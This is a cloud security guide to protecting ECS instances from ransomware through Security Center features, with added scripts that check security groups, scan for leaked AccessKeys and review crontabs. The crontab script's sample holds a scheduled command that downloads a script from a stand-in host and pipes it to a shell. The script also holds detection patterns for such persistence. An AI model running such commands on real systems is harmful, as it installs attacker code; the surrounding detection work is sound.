After ransomware intrudes into an Elastic Compute Service (ECS) instance, data on the instance is encrypted and is used by attackers for ransom. This causes service interruptions, data leaks, and data loss. This topic describes the solutions that you can use to protect your ECS instances from ransomware.
Common causes of ransomware intrusion
- Important accounts with weak passwords or no authentication mechanism
  - Weak passwords or no passwords are configured for important accounts on your server, such as the root account and the administrator account.
  - Weak passwords or no passwords are configured for databases on which important services are deployed, such as Redis, MongoDB, MySQL, and Microsoft SQL Server.
- Services exposed on the Internet because no access control policies are configured
  - Services such as RDP, SSH, Redis, MongoDB, MySQL, and Microsoft SQL Server can be accessed from the Internet, which leaves them exposed to attack.
- High-risk vulnerabilities in the operating systems and software of your servers
  - High-risk vulnerabilities exist in the operating systems and software of your servers. Attackers exploit them remotely to upload encryption ransomware or run ransomware operations.
| Phase | Measure | Description | Related feature |
| --- | --- | --- | --- |
| Before ransomware intrusion | Check security configurations. | Security Center provides the asset exposure analysis, baseline check, configuration assessment, and AccessKey pair leak detection features. You can use these features to check your security configurations before an attack occurs. | Asset exposure analysis, baseline check, configuration assessment, AccessKey pair leak detection |
| Before ransomware intrusion | Scan servers for vulnerabilities and fix detected vulnerabilities at the earliest opportunity. | Security Center provides the vulnerability fixing feature. If Security Center detects vulnerabilities on your servers, we recommend that you use the feature to fix high-risk vulnerabilities at the earliest opportunity. | Vulnerability fixing |
| Before ransomware intrusion | Create anti-ransomware policies for servers and databases. | Security Center provides the anti-ransomware for servers and anti-ransomware for databases features to defend against ransomware. You can use the features to protect your servers and databases from ransomware. | Backups based on anti-ransomware policies |
| Before ransomware intrusion | Enable features supported by the proactive defense module. | Security Center provides the proactive defense module. The features that the module supports can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature, which can be used to precisely block ransomware. | Proactive defense |
| During ransomware intrusion | Handle alerts generated by Security Center at the earliest opportunity. | Security Center generates different types of alerts for your assets in real time, including alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take action at the earliest opportunity. | Alerts |
| After ransomware intrusion | Restore encrypted data of your assets. | Security Center provides the anti-ransomware for servers and anti-ransomware for databases features. The features allow you to create anti-ransomware policies for your servers and databases and back up their data based on the policies. If the data on your servers or databases is encrypted by ransomware, you can create a restoration task to restore the data. | Backups based on anti-ransomware policies |
| After ransomware intrusion | Trace ransomware attacks. | Security Center provides the attack source tracing feature. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions. | Attack source tracing |
The following sections describe the features and operations related to anti-ransomware solutions.
Asset exposure analysis
- Analysis of exposed components
  - Asset exposure analysis allows you to view exposed components to check whether components or services such as Redis, MongoDB, and Elasticsearch are exposed on the Internet. If a component is exposed, you can cut off its Internet access path. For example, you can configure security groups to allow requests only from specific CIDR blocks.
- Analysis of exposed weak passwords
  - If a system uses weak passwords and is exposed on the Internet, the system can be easily attacked. You must fix the risks caused by the weak passwords at the earliest opportunity.
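The following script shows how the security group check described above can be automated. It is an added example and not Security Center's or the ECS SDK's own code: each rule is a dictionary shaped like a Permission entry returned by the ECS DescribeSecurityGroupAttribute API (fields IpProtocol, PortRange, SourceCidrIp, Policy, Direction), the watched port list is an assumption based on the services the page names, and the sample rules are constructed. It reports every ingress accept rule that opens a watched port to any source, and `restrict_source` shows the remediation the page recommends, narrowing the source to one CIDR block.

```python
"""Flag security group rules that expose administrative or database services
to the Internet.

Added example, not Security Center's or the ECS SDK's own code. Each rule is a
dict shaped like a Permission entry returned by the ECS
DescribeSecurityGroupAttribute API (IpProtocol, PortRange, SourceCidrIp,
Policy, Direction). SAMPLE_RULES is constructed for illustration.
"""
import ipaddress

# Default TCP ports of the services the page lists as commonly exposed (assumption).
WATCHED_PORTS = {
    22: "SSH", 3389: "RDP", 3306: "MySQL", 1433: "SQL Server",
    6379: "Redis", 27017: "MongoDB", 9200: "Elasticsearch",
}


def port_bounds(port_range):
    """Parse an ECS PortRange such as '6379/6379'; '-1/-1' means all ports."""
    lo, hi = (int(p) for p in port_range.split("/"))
    return (1, 65535) if lo == -1 else (lo, hi)


def is_any_source(cidr):
    """True for 0.0.0.0/0 or ::/0, i.e. the rule accepts traffic from anywhere.
    A specific CIDR block (the remediation the page recommends) returns False."""
    try:
        return ipaddress.ip_network(cidr, strict=False).prefixlen == 0
    except ValueError:
        return True  # unparsable source: surface it for manual review


def find_exposed_services(permissions):
    """Return sorted (service, port, source) triples for ingress accept rules
    that open a watched port to any Internet source."""
    findings = set()
    for rule in permissions:
        if rule.get("Direction", "ingress") != "ingress":
            continue  # egress rules do not expose listeners
        if rule.get("Policy", "Accept").lower() != "accept":
            continue  # explicit deny rules are not exposures
        if rule.get("IpProtocol", "ALL").upper() not in ("TCP", "ALL"):
            continue  # the watched services listen on TCP
        source = rule.get("SourceCidrIp", "")
        if not source or not is_any_source(source):
            continue
        lo, hi = port_bounds(rule.get("PortRange", "-1/-1"))
        for port, service in WATCHED_PORTS.items():
            if lo <= port <= hi:
                findings.add((service, port, source))
    return sorted(findings)


def restrict_source(rule, cidr):
    """Copy of a rule with its source narrowed to one CIDR block, which is how
    the page says an exposed component should be cut off from the Internet."""
    return {**rule, "SourceCidrIp": cidr}


# Constructed sample rules, not captured from a real security group.
SAMPLE_RULES = [
    {"Direction": "ingress", "Policy": "Accept", "IpProtocol": "TCP",
     "PortRange": "6379/6379", "SourceCidrIp": "0.0.0.0/0"},       # Redis open to all
    {"Direction": "ingress", "Policy": "Accept", "IpProtocol": "TCP",
     "PortRange": "22/22", "SourceCidrIp": "10.0.0.0/8"},          # SSH from the VPC only
    {"Direction": "ingress", "Policy": "Drop", "IpProtocol": "TCP",
     "PortRange": "3306/3306", "SourceCidrIp": "0.0.0.0/0"},       # explicit deny
    {"Direction": "ingress", "Policy": "Accept", "IpProtocol": "TCP",
     "PortRange": "1024/65535", "SourceCidrIp": "0.0.0.0/0"},      # broad high-port range
    {"Direction": "ingress", "Policy": "Accept", "IpProtocol": "TCP",
     "PortRange": "3389/3389", "SourceCidrIp": "203.0.113.0/24"},  # RDP from one admin block
    {"Direction": "egress", "Policy": "Accept", "IpProtocol": "TCP",
     "PortRange": "27017/27017", "DestCidrIp": "0.0.0.0/0"},       # outbound, ignored
]

if __name__ == "__main__":
    for service, port, source in find_exposed_services(SAMPLE_RULES):
        print(f"{service:<14} tcp/{port:<5} open to {source}")
```

Note that the broad 1024/65535 rule is what produces most of the findings: a wide port range with an any-address source exposes every database listener in the range, not just the one port the rule was written for.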
Baseline check
You can use the baseline check feature to check for threats in the baseline configurations that are included in the default baseline check policy. The threats include weak passwords, unauthorized access, vulnerabilities, and configuration risks. After you fix the detected baseline risks on your system, databases, and software, you can prevent ransomware in an efficient manner. For more information, see Overview.
Configuration assessment
You can use the configuration assessment feature to check the following configurations of your Alibaba Cloud services for risks: identity authentication and permissions, network access control, data security, log audit, monitoring and alerting, and basic security protection. If risks are detected, Security Center provides solutions. We recommend that you handle the detected high-risk items. For more information, see Overview.
AccessKey pair leak detection
You can use the feature of AccessKey pair leak detection to check the usernames and passwords in source code stored on platforms such as GitHub in real time. This helps you detect leaks of the usernames and passwords for your assets. If leaks are detected, Security Center generates alerts. This helps you detect and handle potential AccessKey pair leaks at the earliest opportunity. For more information, see Detection of AccessKey pair leaks.
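A local check of the kind described above, run before code is pushed, complements the console-side detection. This is an added example, not Security Center's AccessKey pair leak detection, and it rests on two assumptions: AccessKey IDs begin with "LTAI" followed by alphanumerics, and a secret is a 30-character alphanumeric value assigned to a name containing "secret". The sample configuration is constructed and the credentials in it are fake.

```python
"""Scan source text for Alibaba Cloud AccessKey pairs before it is committed.

Added example, not Security Center's AccessKey pair leak detection. Assumptions:
AccessKey IDs start with "LTAI" followed by alphanumerics, and a secret is a
30-character alphanumeric value assigned to a name containing "secret".
SAMPLE_CONFIG is constructed and the credentials in it are fake.
"""
import re

ACCESS_KEY_ID = re.compile(r"\bLTAI[A-Za-z0-9]{12,24}\b")
ACCESS_KEY_SECRET = re.compile(
    r"(?i)(?:access[_-]?key[_-]?secret|secret[_-]?key|ak[_-]?secret)"
    r"\s*[:=]\s*['\"]?([A-Za-z0-9]{30})\b"
)


def mask(value):
    """Keep only the first and last four characters so the report itself
    does not leak the credential."""
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan_text(text, source="<memory>"):
    """Return one finding per credential-looking token, with masked values."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in ACCESS_KEY_ID.finditer(line):
            findings.append({"file": source, "line": no,
                             "kind": "AccessKeyId", "value": mask(m.group(0))})
        for m in ACCESS_KEY_SECRET.finditer(line):
            findings.append({"file": source, "line": no,
                             "kind": "AccessKeySecret", "value": mask(m.group(1))})
    return findings


def scan_files(paths):
    """Scan files on disk, for example from a pre-commit hook; unreadable
    files are skipped rather than aborting the whole scan."""
    findings = []
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_text(fh.read(), source=path))
        except OSError:
            continue
    return findings


# Constructed sample: a config file someone is about to push. The values are fake.
SAMPLE_CONFIG = """\
[alibabacloud]
region = cn-hangzhou
access_key_id = LTAI5tFakeKeyId00000
access_key_secret = FakeSecretFakeSecretFakeSecret
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CONFIG, "config.ini"):
        print(f"{f['file']}:{f['line']}: {f['kind']} {f['value']}")
```

A hook that exits non-zero when `scan_files` returns anything stops the commit before the pair ever reaches a public platform, which is cheaper than rotating the key after Security Center raises the leak alert.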
Configure scheduled vulnerability detection
We recommend that you enable application vulnerability detection and set the scheduled vulnerability detection cycle to the shortest available value, which is three days. Make sure that only vulnerabilities that genuinely need to be excluded are added to the vulnerability whitelist. For more information, see Configure vulnerability settings.
Priorities to fix vulnerabilities
Application vulnerabilities are detected and classified based on whether they are compliance issues or can be easily exploited. If a detected application vulnerability can be easily exploited, its details are displayed in the Security Center console, and a Proof of Concept (PoC) or exploit for it can be easily obtained from the Internet. Such vulnerabilities are readily exploited by attackers, mining programs, and computer worms, so you must fix them first, in descending order of priority. The priority is determined by the urgency score of each vulnerability. You must also fix vulnerabilities that are detected on services that are not exposed, so that attackers, mining programs, and computer worms cannot exploit them for lateral movement in your internal network; this reduces the adverse impact on your assets. For more information, see Priorities to fix vulnerabilities.
Exploitability of vulnerabilities
- Fix vulnerabilities
  - Follow the solutions included in the vulnerability details.
- Handle vulnerabilities
  - Click the ID of a security group or an instance to go to the page that displays the configurations of the specified security group, Server Load Balancer (SLB) instance, or Network Address Translation (NAT) gateway. On the page, delete the port forwarding rule that exposes your services on the Internet, or configure the security group to allow requests only from specific IP addresses or CIDR blocks. Handling a vulnerability this way reduces its exposure but does not remove it; you still need to fix the vulnerability.
For more information about how to fix a vulnerability, see Overview.
Alerts
Security Center generates different types of alerts for your assets in real time, including alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take action at the earliest opportunity.
You can perform the following steps to handle alerts on ransomware:
- Log on to the Security Center console.
- In the left-side navigation pane, go to the Alerts page.
- In the alert list of the Alerts page, find the alert on ransomware and click Process in the Actions column.
- In the dialog box that appears, set Process Method to Anti-Virus and select Isolate the source file of the process.
- Click Process Now. After you isolate the source file of a malicious process, the process can no longer be started.
- Log on to the server on which the alert is generated and check whether a suspicious scheduled task exists in the crontab file. If a suspicious scheduled task exists, delete or comment out the task.
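The last step above is the one most often done by eye. The following script, an added example that is not part of Security Center or its agent, shows one way to make the crontab review repeatable: it parses the scheduling lines, flags entries that trip a small set of constructed indicators (remote content piped into a shell, base64 decoding at run time, paths under world-writable directories, the immutable attribute), and produces a copy of the crontab with the flagged lines commented out, which is the action the step recommends. The indicators are illustrative heuristics rather than the product's detection models, and the sample crontab is constructed.

```python
"""Review a crontab for scheduled tasks that look like ransomware persistence.

Added example, not part of Security Center or its agent. INDICATORS are
constructed heuristics for illustration, not the product's detection models,
and SAMPLE_CRONTAB is constructed. review_crontab() lists the suspicious
entries and neutralize() returns the crontab with those entries commented out.
"""
import re

# A scheduling line: either an @keyword or five time fields, then the command.
CRON_ENTRY = re.compile(r"^\s*(@\w+|(?:\S+\s+){5})(.+)$")

# Constructed heuristics; extend them for the hosts you review.
INDICATORS = [
    (re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|z|da)?sh\b"),
     "downloads remote content and pipes it into a shell"),
    (re.compile(r"\bbase64\b[^|;&]*(?:\s-d\b|\s--decode\b)"),
     "decodes a base64 payload at run time"),
    (re.compile(r"(?:^|[\s=>|])(?:/tmp|/var/tmp|/dev/shm)/\S+"),
     "runs or writes under a world-writable directory"),
    (re.compile(r"\bchattr\s+\+i\b"),
     "sets the immutable attribute, often used to pin a persistence file"),
]


def parse_crontab(text):
    """Return (line_no, schedule, command) for each scheduling line; blank
    lines, comments and VAR=value assignments are skipped."""
    entries = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = CRON_ENTRY.match(line)
        if m:
            entries.append((no, m.group(1).strip(), m.group(2).strip()))
    return entries


def review_crontab(text):
    """Return the entries that trip at least one indicator, with the reasons."""
    findings = []
    for no, schedule, command in parse_crontab(text):
        reasons = [why for pattern, why in INDICATORS if pattern.search(command)]
        if reasons:
            findings.append({"line": no, "schedule": schedule,
                             "command": command, "reasons": reasons})
    return findings


def neutralize(text, findings):
    """Copy of the crontab with every flagged line commented out. Commenting
    rather than deleting keeps the line as evidence for later investigation."""
    flagged = {f["line"] for f in findings}
    lines = text.splitlines()
    for idx in flagged:
        lines[idx - 1] = "# DISABLED: " + lines[idx - 1]
    return "\n".join(lines) + "\n"


# Constructed sample crontab, not captured from a real host.
SAMPLE_CRONTAB = """\
# nightly jobs
MAILTO=root
0 2 * * * /usr/bin/backup --target /data
*/5 * * * * curl -s http://example.invalid/x.sh | sh
@reboot /dev/shm/.x/run
30 3 * * 0 echo aGVsbG8= | base64 -d > /tmp/out
"""

if __name__ == "__main__":
    found = review_crontab(SAMPLE_CRONTAB)
    for f in found:
        print(f"line {f['line']}: {f['command']}")
        for why in f["reasons"]:
            print(f"    - {why}")
    print(neutralize(SAMPLE_CRONTAB, found))
```

Run it against the output of `crontab -l` for each user and against the files under `/etc/cron.d`, and keep the original file alongside the neutralized copy so that attack source tracing still has the unmodified evidence.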
Proactive defense
Security Center provides the proactive defense module. The features that the module supports can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature, which you can use to block ransomware before an attack occurs. For more information about how to enable the virus blocking feature, see Use proactive defense.
Ransomware may adversely affect the Security Center agent. We recommend that you enable the client protection feature. For more information about how to enable the client protection feature, see Use the client protection feature.
Backups based on anti-ransomware policies
- Anti-ransomware for servers
  - You can use the anti-ransomware feature of Security Center to create anti-ransomware policies for your server. The server can be an ECS instance, a server that is not deployed on Alibaba Cloud, a server that is deployed in the classic network, or a server that is deployed in a virtual private cloud (VPC). After you create an anti-ransomware policy, Security Center automatically backs up data in the protected directories on your server. If your server is attacked by ransomware, you can restore data from the backups. This prevents negative impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.
- Anti-ransomware for databases
  - You can create anti-ransomware policies for the following types of databases that are deployed on ECS instances to back up their data: MySQL, Oracle, and SQL Server. If your database is intruded by ransomware, you can restore its data from the backups. This prevents adverse impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.
- Data backup consumes network bandwidth. We recommend that you set the Start Time parameter of an anti-ransomware policy to a point in time within off-peak hours, based on your business requirements, and that the time is not the start of an hour. If you perform a full backup for the first time or an incremental backup of a large number of files, the backup may take several hours.
- We recommend that you specify only specific directories that you want to protect when you create an anti-ransomware policy. This helps release the anti-ransomware capacity and minimize the impacts on the performance of your server.
- We recommend that you check the anti-ransomware capacity on a regular basis to ensure that you have sufficient anti-ransomware capacity. If the anti-ransomware capacity is insufficient and you do not purchase additional anti-ransomware capacity or delete backup data to release the anti-ransomware capacity, data backup is stopped. The backup data is automatically deleted after the specified retention period.
- If you back up a directory of an ECS instance to which an Apsara File Storage NAS (NAS) file system or Object Storage Service (OSS) bucket is mounted, the data in the NAS file system or OSS bucket is backed up. We recommend that you exclude mount directories when you specify directories to protect, or specify only necessary data in the mount directories to protect.
- A large number of data fragments can cause high disk space usage, log storage usage, and memory usage. We recommend that you clear data from your disks on a regular basis. For more information about how to clear data from a disk, see Release disk space occupied by backup caches.
Attack source tracing
Security Center provides the feature of attack source tracing. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions. For more information, see Use attack source tracing.